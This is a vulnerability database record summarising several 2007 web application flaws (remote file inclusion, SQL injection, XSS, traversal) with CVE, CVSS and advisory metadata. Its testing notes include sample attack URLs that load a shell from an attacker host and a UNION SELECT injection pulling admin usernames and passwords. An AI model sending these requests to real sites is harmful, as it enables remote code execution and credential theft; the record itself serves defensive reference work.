ID SECURITYVULNS:VULN:7135
Type securityvulns
Reporter
Modified 2007-02-01T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:7135", "bulletinFamily": "software", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2007-02-01T00:00:00", "modified": "2007-02-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7135", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:15933", "https://vulners.com/securityvulns/securityvulns:doc:15926", "https://vulners.com/securityvulns/securityvulns:doc:15935", "https://vulners.com/securityvulns/securityvulns:doc:15930", "https://vulners.com/securityvulns/securityvulns:doc:15934", "https://vulners.com/securityvulns/securityvulns:doc:15928", "https://vulners.com/securityvulns/securityvulns:doc:15924", "https://vulners.com/securityvulns/securityvulns:doc:15947", "https://vulners.com/securityvulns/securityvulns:doc:15946", "https://vulners.com/securityvulns/securityvulns:doc:15929", "https://vulners.com/securityvulns/securityvulns:doc:15927", "https://vulners.com/securityvulns/securityvulns:doc:15931", "https://vulners.com/securityvulns/securityvulns:doc:15932"], "cvelist": ["CVE-2007-0679", "CVE-2007-0649", "CVE-2007-0702", "CVE-2007-0678", "CVE-2007-0683", "CVE-2007-0677", "CVE-2007-0680", "CVE-2007-0676", "CVE-2007-0688", "CVE-2007-0681", "CVE-2007-0628", "CVE-2007-0662", "CVE-2007-0616", "CVE-2007-0687", "CVE-2007-0684"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:23", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2018-08-31T11:09:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0683", "CVE-2007-0684", "CVE-2007-0628", "CVE-2007-0662", "CVE-2007-0680", "CVE-2007-0678", "CVE-2007-0649", "CVE-2007-0679", "CVE-2007-0677", "CVE-2007-0681"]}, {"type": "osvdb", "idList": ["OSVDB:33604", "OSVDB:36041", "OSVDB:33605", "OSVDB:33078", "OSVDB:33072", "OSVDB:33631", "OSVDB:36039", "OSVDB:38130", "OSVDB:33079", "OSVDB:33010"]}, {"type": "exploitdb", "idList": ["EDB-ID:3243", "EDB-ID:3238", "EDB-ID:3239", "EDB-ID:3237", "EDB-ID:3242", "EDB-ID:3236", "EDB-ID:3235", "EDB-ID:3234", "EDB-ID:29557", "EDB-ID:3233"]}, {"type": "nessus", "idList": ["EXOPHPDESK_ID_SQL_INJECTION.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15930", "SECURITYVULNS:DOC:15946", "SECURITYVULNS:DOC:15947", "SECURITYVULNS:DOC:15935", "SECURITYVULNS:DOC:15927", "SECURITYVULNS:DOC:15934", "SECURITYVULNS:DOC:15932", "SECURITYVULNS:DOC:15926", "SECURITYVULNS:DOC:15931", "SECURITYVULNS:DOC:15924", "SECURITYVULNS:DOC:15933", "SECURITYVULNS:DOC:15929", "SECURITYVULNS:DOC:15928"]}], "modified": "2018-08-31T11:09:23", "rev": 2}, "vulnersScore": 4.9}, "affectedSoftware": [{"name": "Extcalendar", "operator": "eq", "version": "2"}, {"name": "Hailboards", "operator": "eq", "version": "1.2"}, {"name": "Java System Access Manager", "operator": "eq", "version": "7.0"}, {"name": "OpenEMR", "operator": "eq", "version": "2.8"}, {"name": "Phpbb Tweaked", "operator": "eq", "version": "3"}, {"name": "zenphoto", "operator": "eq", "version": "1.0"}, {"name": "Cerulean Portal System", "operator": "eq", "version": "0.7"}, {"name": "SIPS", "operator": "eq", "version": "0.3"}, {"name": "phpEventMan", "operator": "eq", "version": "1.0"}, {"name": "ExoPHPDesk", "operator": "eq", "version": "1.2"}, {"name": "Java System Access Manager", "operator": "eq", "version": "6.2"}, {"name": "ExtCalendar", "operator": "eq", "version": "2.0"}, {"name": "Cadre", "operator": "eq", "version": "20020724"}, {"name": "L2J Dropcalc", "operator": "eq", "version": "4"}, {"name": "Java System Access Manager", "operator": "eq", "version": "6.1"}, {"name": "Omegaboard", "operator": "eq", "version": "1.2"}, {"name": "PhpMyRing", "operator": "eq", "version": "4.1"}]}
{"cve": [{"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in lang/leslangues.php in Nicolas Grandjean PHPMyRing 4.1.3b and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fichier parameter.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0679", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0679"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:nicolas_grandjean:phpmyring:4.1.1b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.3b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.2b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.0b"], "id": "CVE-2007-0679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0679", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.1b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.0b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.3b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.2b:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in fw/class.Quick_Config_Browser.php in Cadre PHP Framework 20020724 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[config][framework_path] parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0677", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0677"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:cronosys:cadre_php_framework:22020724"], "id": "CVE-2007-0677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0677", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cronosys:cadre_php_framework:22020724:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in portal.php in Cerulean Portal System 0.7b allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0684", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0684"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:cerulean_portal_system:cerulean_portal_system:0.7b"], "id": "CVE-2007-0684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0684", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerulean_portal_system:cerulean_portal_system:0.7b:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "profile.php in ExtCalendar 2 and earlier allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions, via modified values to register.php.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0681", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0681"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:extcalendar:extcalendar:2"], "id": "CVE-2007-0681", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0681", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:extcalendar:extcalendar:2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/functions.php in Omegaboard 1.0beta4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0683", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0683"], "modified": "2018-11-29T15:45:00", "cpe": ["cpe:/a:omegaboard_project:omegaboard:1.0"], "id": "CVE-2007-0683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0683", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta4:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/usercp_viewprofile.php in Hailboards 1.2.0 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-01T22:28:00", "title": "CVE-2007-0662", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0662"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:hailboards:hailboards:1.2.0"], "id": "CVE-2007-0662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0662", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hailboards:hailboards:1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "SQL injection vulnerability in windows.asp in Fullaspsite Asp Hosting Sitesi allows remote attackers to execute arbitrary SQL commands via the kategori_id parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0678", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0678"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:fullaspsite:asp_hosting_site:*"], "id": "CVE-2007-0678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0678", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fullaspsite:asp_hosting_site:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Access Manager 6.1, 6.2, 6 2005Q1 (6.3), and 7 2005Q4 (7.0) before 20070129 allow remote attackers to inject arbitrary web script or HTML via the (1) goto or (2) gx-charset parameter. NOTE: some of these details are obtained from third party information.", "edition": 4, "cvss3": {}, "published": "2007-01-31T18:28:00", "title": "CVE-2007-0628", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0628"], "modified": "2017-07-29T01:30:00", "cpe": ["cpe:/a:sun:java_system_access_manager:6.2", "cpe:/a:sun:java_system_access_manager:6.3", "cpe:/a:sun:java_system_access_manager:7.0", "cpe:/a:sun:java_system_access_manager:6.1"], "id": "CVE-2007-0628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0628", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sun:java_system_access_manager:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "Variable overwrite vulnerability in interface/globals.php in OpenEMR 2.8.2 and earlier allows remote attackers to overwrite arbitrary program variables and conduct other unauthorized activities, such as conduct (a) remote file inclusion attacks via the srcdir parameter in custom/import_xml.php or (b) cross-site scripting (XSS) attacks via the rootdir parameter in interface/login/login_frame.php, via vectors associated with extract operations on the (1) POST and (2) GET superglobal arrays. NOTE: this issue was originally disputed before the extract behavior was identified in post-disclosure analysis. Also, the original report identified \"Open Conference Systems,\" but this was an error.\nIncorrect bug report. This CVE should have a score of 0 because there are no products affected.", "edition": 6, "cvss3": {}, "published": "2007-02-01T01:28:00", "title": "CVE-2007-0649", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.2, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:H/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0649"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:openemr:openemr:2.8.2"], "id": "CVE-2007-0649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0649", "cvss": {"score": 4.3, "vector": "AV:N/AC:H/Au:M/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openemr:openemr:2.8.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/functions.php in Phpbb Tweaked 3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0680", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0680"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:phpbb_tweaked:phpbb_tweaked:3", "cpe:/a:phpbb_tweaked:phpbb_tweaked:1"], "id": "CVE-2007-0680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0680", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpbb_tweaked:phpbb_tweaked:1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_tweaked:phpbb_tweaked:3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-0679"], "description": "## Manual Testing Notes\nhttp://[target]/[path]//lang/leslangues.php?fichier=[SHELL]\n## References:\nISS X-Force ID: 32033\nGeneric Exploit URL: http://milw0rm.com/exploits/3238\nFrSIRT Advisory: ADV-2007-0448\n[CVE-2007-0679](https://vulners.com/cve/CVE-2007-0679)\nBugtraq ID: 22345\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36039", "id": "OSVDB:36039", "title": "PHPMyRing lang/leslangues.php fichier Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0684"], "description": "## Manual Testing Notes\nhttp://[target]/[script_pat]/portal/portal.php?phpbb_root_path=http://[attacker]?\n## References:\nOther Advisory URL: http://www.xoron.info/bugs/ceruleanportalsystem-perl.txt\nOther Advisory URL: http://www.xoron.info/bugs/ceruleanportalsystem-html.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0008.html\nISS X-Force ID: 32058\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3243\nFrSIRT Advisory: ADV-2007-0444\n[CVE-2007-0684](https://vulners.com/cve/CVE-2007-0684)\nBugtraq ID: 22356\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:33605", "id": "OSVDB:33605", "title": "Cerulean Portal System portal.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0680"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/includes/functions.php?phpbb_root_path=http://[attacker]?\n## References:\nVendor URL: http://sourceforge.net/projects/phpbbtweaked/\n[Secunia Advisory ID:24001](https://secuniaresearch.flexerasoftware.com/advisories/24001/)\nOther Advisory URL: http://www.xoron.info/bugs/phpbbtweaked.txt\nOther Advisory URL: http://milw0rm.com/exploits/3235\nISS X-Force ID: 32024\nFrSIRT Advisory: ADV-2007-0451\n[CVE-2007-0680](https://vulners.com/cve/CVE-2007-0680)\nBugtraq ID: 22344\n", "edition": 1, "modified": "2007-01-31T07:33:45", "published": "2007-01-31T07:33:45", "href": "https://vulners.com/osvdb/OSVDB:33079", "id": "OSVDB:33079", "title": "Phpbb Tweaked includes/functions.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0677"], "description": "## Manual Testing Notes\nhttp://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?\n## References:\nOther Advisory URL: http://echo.or.id/adv/adv63-y3dips-2007.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0691.html\nISS X-Force ID: 32005\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3237\nFrSIRT Advisory: ADV-2007-0449\n[CVE-2007-0677](https://vulners.com/cve/CVE-2007-0677)\nBugtraq ID: 22336\n", "edition": 1, "modified": "2007-01-31T01:49:56", "published": "2007-01-31T01:49:56", "href": "https://vulners.com/osvdb/OSVDB:33631", "id": "OSVDB:33631", "title": "Cadre PHP Framework fw/class.Quick_Config_Browser.php GLOBALS[config][framework_path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-0678"], "description": "## Manual Testing Notes\nhttp://[target]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin\n## References:\nISS X-Force ID: 32020\nGeneric Exploit URL: http://milw0rm.com/exploits/3233\nFrSIRT Advisory: ADV-2007-0453\n[CVE-2007-0678](https://vulners.com/cve/CVE-2007-0678)\nBugtraq ID: 22347\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36041", "id": "OSVDB:36041", "title": "Fullaspsite Asp Hosting Sitesi windows.asp kategori_id Variable", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-0681"], "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32035\nGeneric Exploit URL: http://milw0rm.com/exploits/3239\n[CVE-2007-0681](https://vulners.com/cve/CVE-2007-0681)\n", "edition": 1, "modified": "2007-01-31T16:56:04", "published": "2007-01-31T16:56:04", "href": "https://vulners.com/osvdb/OSVDB:38130", "id": "OSVDB:38130", "title": "ExtCalendar profile.php Arbitrary User Password Modification", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0628"], "description": "# No description provided by the source\n\n## References:\nVendor Specific Solution URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102621-1\nSecurity Tracker: 1017570\n[Secunia Advisory ID:23979](https://secuniaresearch.flexerasoftware.com/advisories/23979/)\nISS X-Force ID: 31936\nFrSIRT Advisory: ADV-2007-0411\n[CVE-2007-0628](https://vulners.com/cve/CVE-2007-0628)\nBugtraq ID: 22302\n", "edition": 1, "modified": "2007-01-27T06:48:54", "published": "2007-01-27T06:48:54", "href": "https://vulners.com/osvdb/OSVDB:33010", "id": "OSVDB:33010", "title": "Sun Java System Access Manager Multiple XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0683"], "description": "## Manual Testing Notes\nhttp://[target]/[script_pat]/includes/functions.php?phpbb_root_path=http://[attacker]?\n## References:\nOther Advisory URL: http://www.xoron.info/bugs/omegaboard-perl.txt\nOther Advisory URL: http://www.xoron.info/bugs/omegaboard-html.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0007.html\nISS X-Force ID: 32057\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3242\nFrSIRT Advisory: ADV-2007-0445\n[CVE-2007-0683](https://vulners.com/cve/CVE-2007-0683)\nBugtraq ID: 22355\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:33604", "id": "OSVDB:33604", "title": "Omegaboard includes/functions.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0662"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/includes/usercp_viewprofile.php?phpbb_root_path=http://[attacker]?\n## References:\nVendor URL: http://hailboards.org/\n[Secunia Advisory ID:24002](https://secuniaresearch.flexerasoftware.com/advisories/24002/)\nOther Advisory URL: http://milw0rm.com/exploits/3236\nISS X-Force ID: 31997\nFrSIRT Advisory: ADV-2007-0450\n[CVE-2007-0662](https://vulners.com/cve/CVE-2007-0662)\nBugtraq ID: 22333\n", "edition": 1, "modified": "2007-01-31T06:18:27", "published": "2007-01-31T06:18:27", "href": "https://vulners.com/osvdb/OSVDB:33078", "id": "OSVDB:33078", "title": "Hailboards includes/usercp_viewprofile.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0616"], "description": "## Solution Description\nUpgrade to version 1.0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.zenphoto.org/support/topic.php?id=1148\nVendor Specific News/Changelog Entry: http://www.zenphoto.org/support/topic.php?id=1146&replies=3\n[Secunia Advisory ID:24026](https://secuniaresearch.flexerasoftware.com/advisories/24026/)\nISS X-Force ID: 32102\nFrSIRT Advisory: ADV-2007-0470\n[CVE-2007-0616](https://vulners.com/cve/CVE-2007-0616)\nBugtraq ID: 22368\n", "edition": 1, "modified": "2007-01-23T12:26:34", "published": "2007-01-23T12:26:34", "href": "https://vulners.com/osvdb/OSVDB:33072", "id": "OSVDB:33072", "title": "zenphoto index.php album Variable Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:02:04", "description": "PHPMyRing <= 4.1.3b (fichier) Remote File Include Vulnerability. CVE-2007-0679. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "PHPMyRing <= 4.1.3b fichier Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0679"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3238", "href": "https://www.exploit-db.com/exploits/3238/", "sourceData": "*******************************************************************************\n# Title : PhpMyRing <= 4.1.3b (path) Remote File Include 